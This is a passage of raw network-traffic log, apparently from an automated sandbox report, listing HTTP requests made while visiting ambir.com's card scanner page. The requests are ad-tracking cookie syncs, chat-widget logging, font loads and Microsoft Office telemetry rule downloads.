_gcl_au=1.1.1093817975.1732134501; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134510.50.0.1978750408; _ga_4J1BFCRRT4=GS1.1.1732134510.1.0.1732134510.0.0.0; __adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472; __ar_v4=%7CGXXT3DJJNNBKHGBC62RAND%3A20241120%3A1%7CPQV7D44IFRBCBMEQBHSAR6%3A20241120%3A1; wcsid=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor; hblid=QnUrnKaYLl744rSP542fr0UBrj6a8ok0; _oklv=1732134513120%2CtM65kxeIWm5Vcm4e542fr0UBjA8B6bor; _okdetect=%7B%22token%22%3A%2217321345179820%22%2C%22proto%22%3A%22about%3A%22%2C%22host%22%3A%22%22%7D; olfsk=olfsk3312040382365413; _okbk=cd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1732134523603%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=7486-534-10-2045
      Source: global trafficHTTP traffic detected: GET /ups/55980/sync?_origin=1&uid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=BOOla_OOOla_OA2ABBENAkwAAAAXyACAAyAIIA HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jslog/log.png?version=-bucket5&location=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&message=%23chatbox-size-md%20%23using_theme.cryptic_capybara%20%23using_theme%20&tabname=oktab23158355009433307&conversation_id=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&visitor_id=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&site_id=7486-534-10-2045&bucket=bucket5&level=count&timestamp=1732134524213&properties=%7B%7D&recent_logs=%5B%5D HTTP/1.1Host: log.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /cookie-sync?p=adroll&uid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=&us_privacy=1--- HTTP/1.1Host: sync.outbrain.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /jsclient/fonts/noto-sans-v11-latin-700.woff2 HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ambir.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.olark.com/jsclient/styles/cryptic-capybara/theme.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jsclient/fonts/noto-sans-v11-latin-regular.woff2 HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ambir.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.olark.com/jsclient/styles/cryptic-capybara/theme.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=1830&partner_device_id=fd66934f-cc4b-4a94-91f3-b309aaa3bde2&ttd_puid=fca0ae6b-4903-4b6e-b6de-6aa8c515508a%2C%2C HTTP/1.1Host: pixel.tapad.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1732134520945; TapAd_DID=fca0ae6b-4903-4b6e-b6de-6aa8c515508a; TapAd_3WAY_SYNCS=1!7820
      Source: global trafficHTTP traffic detected: GET /cm/taboola/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /cm/triplelift/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /w/1.0/sd?cc=1&id=537103138&val=16b1e49ed627599a8c527b960adbb83e&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=f09fa523-b3d3-4df5-bbbb-909001f691d2|1732134527
      Source: global trafficHTTP traffic detected: GET /cm/x/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /uev/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6/?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&event_name=productView&xa4=1&adroll_version=2.0 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134510.50.0.1978750408; _ga_4J1BFCRRT4=GS1.1.1732134510.1.0.1732134510.0.0.0; __adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472; __ar_v4=%7CGXXT3DJJNNBKHGBC62RAND%3A20241120%3A1%7CPQV7D44IFRBCBMEQBHSAR6%3A20241120%3A1; wcsid=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor; hblid=QnUrnKaYLl744rSP542fr0UBrj6a8ok0; _oklv=1732134513120%2CtM65kxeIWm5Vcm4e542fr0UBjA8B6bor; _okdetect=%7B%22token%22%3A%2217321345179820%22%2C%22proto%22%3A%22about%3A%22%2C%22host%22%3A%22%22%7D; olfsk=olfsk3312040382365413; _okbk=cd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1732134523603%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=7486-534-10-2045
      Source: global trafficHTTP traffic detected: GET /jslog/log.png?version=-bucket5&location=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&message=%23chatbox-size-md%20%23using_theme.cryptic_capybara%20%23using_theme%20&tabname=oktab23158355009433307&conversation_id=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&visitor_id=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&site_id=7486-534-10-2045&bucket=bucket5&level=count&timestamp=1732134524213&properties=%7B%7D&recent_logs=%5B%5D HTTP/1.1Host: log.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ups/55980/sync?_origin=1&uid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=BOOla_OOOla_OA2ABBENAkwAAAAXyACAAyAIIA&verify=true HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBIFGPmcCEEv8nSbb5PhzYPYyCrf7OSMFEgEBAQGYP2dIZ9xH0iMA_eMAAA&S=AQAAAjWtgYP5lR8lSQfuZFCjfxM
      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTMzMDYmdGw9MTI5NjAw&piggybackCookie=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=BOOoKswOOoKswA2ABBENAkwAAAAXyACACYAIIA HTTP/1.1Host: image2.pubmatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KRTBCOOKIE_10=22808-MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&KRTB&22883-MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&KRTB&23504-MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&KRTB&23615-MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U; PugT=1732134529
      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /xuid?mid=4714&xuid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&dongle=c85e HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /attribution/trigger?fpc=d3ee31a855380a6a19350bbaa666e259&advertisable_eid=GXXT3DJJNNBKHGBC62RAND&conversion_type=ProductView&currency=USC&flg=1&pv=74305401830.21593&rd=https%3A%2F%2Fd.adroll.com%2Fuev0%3Fxae1%3DGXXT3DJJNNBKHGBC62RAND%26xen1%3DproductView%26xoe1%3DYK5WPZRLU5ADVBKNOYLBSZ%26xpe1%3DPQV7D44IFRBCBMEQBHSAR6&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F HTTP/1.1Host: x.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; ar_debug=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /setuid?entity=172&code=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /sg/adroll-network/1/rtb-h?taboola_hm=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: sync.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /xuid?ld=1&mid=4714&xuid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&dongle=c85e&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3480130029132749815081; tluid=3480130029132749815081
      Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D172%26code%3DMTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=43YqP_SRdql-sldSCuHhSh5_VRPZdoQT8Uu_ck602lrFGOuxOrFILsdqbbq9VQSzYKOhHsgvPzuYSa3mL4vHUY3p0iD-x6mJKDUsb6XjQ8A.; receive-cookie-deprecation=1; uuid2=804763998252466527
      Source: global trafficHTTP traffic detected: GET /uev0?xae1=GXXT3DJJNNBKHGBC62RAND&xen1=productView&xoe1=YK5WPZRLU5ADVBKNOYLBSZ&xpe1=PQV7D44IFRBCBMEQBHSAR6 HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
